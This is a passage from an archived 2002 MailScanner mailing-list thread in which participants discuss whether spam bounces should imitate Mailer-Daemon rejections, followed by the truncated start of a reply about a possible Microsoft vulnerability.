SPAM does not work anyway though. Also, >just in case of a false hit you would want an explanation to a >legitimate sender. > >Matt > > > I've been playing with this in 4.0 and was wondering... Wouldn't it > > better for MS to bounce back the message in such a way that it appears > > > to be a Mailer-Daemon rejection message? Basically making it appear > > to have come from the MTA? I wouldn't think spammers are going to > > look that closely at the header and see that it's not a real bounce. > > If the bounce message appears to be a rejection then "maybe" and I do > > mean maybe, the address would get removed from their list. -- Julian Field Teaching Systems Manager jkf@ecs.soton.ac.uk Dept. of Electronics & Computer Science Tel. 023 8059 2817 University of Southampton Southampton SO17 1BJ From mailscanner at ecs.soton.ac.uk Sun Sep 29 14:47:14 2002 From: mailscanner at ecs.soton.ac.uk (Julian Field) Date: Thu Jan 12 21:15:48 2006 Subject: Possible Microsoft security vulnerability attack? In-Reply-To: <016e01c26765$b4574050$0200a8c0@mis1n> Message-ID: <5.1.0.14.2.20020929144523.0228d9c8@imap.ecs.soton.ac.uk> If you had read the ChangeLog, you would have seen this: >Version 3.23-3 >============== >The